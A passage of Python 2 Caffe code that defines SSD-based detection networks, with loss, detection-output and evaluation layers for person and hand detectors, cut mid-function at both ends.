include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
if flag_train_withperson:
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
return net
def DAPNetVGGReduceNoConcat(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
# BaseNet
flag_use_dark = False
if flag_use_dark:
net = YoloNetPart(net, from_layer="data", use_bn=True, use_layers=5, use_sub_layers=5, final_pool=True, lr=1,
decay=1)#1.47G, 13.7M
else:
# c = ((32,), (32,), (32, 32, 128), (64, 64, 128), (128, 128, 256))#1.74G, 19.43M
# net = VGG16_BaseNet_ChangeChannel(net, "data", channels=c)
channels = ((32,), (32,), (64, 32, 128), (128, 64, 128, 64, 256), (256, 128, 256, 128, 256))
strides = (True, True, True, False, False)
kernels = ((3,), (3,), (3, 1, 3), (3, 1, 3, 1, 3), (3, 1, 3, 1, 3))
pool_last = (False,False,False,True,True)
net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer, channels=channels, strides=strides,
kernels=kernels,freeze_layers=[], pool_last=pool_last,use_bn=True,truncvalues=truncvalues)
lr_detnetperson = 1.0
# Add Conv6
conv6_output = Conv6_Param.get('conv6_output',[])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
out_layer = "pool5"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=False,lr_mult=lr_detnetperson, decay_mult=1,n_group=1,truncvalues=truncvalues)
print net.keys()
# Create SSD Header for SSD1
if flag_train_withperson:
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_detnetperson)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
if flag_train_withperson:
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
return net
# Final Network
def DAPNet_hand_pool1(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
lr_basenet =0
# BaseNet
use_sub_layers = ()# exmpty means only has conv1 and pooling
num_channels = ()
output_channels = (0, )
channel_scale = 4
add_strs = "_recon"
net = ResidualVariant_Base_A(net, data_layer=data_layer, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels, channel_scale=channel_scale, lr=lr_basenet, decay=lr_basenet,
add_strs=add_strs)
print net.keys()
# make Loss & Detout for SSD2
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
# mbox_2_layers.append(net[data_layer])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
'size_threshold_max':ssd_Param_2.get("bboxloss_size_threshold_max",2),
'flag_showdebug':ssd_Param_2.get("flag_showdebug",False),
'flag_forcematchallgt':ssd_Param_2.get("flag_forcematchallgt",False),
'flag_areamaxcheckinmatch':ssd_Param_2.get("flag_areamaxcheckinmatch",True),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False,False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
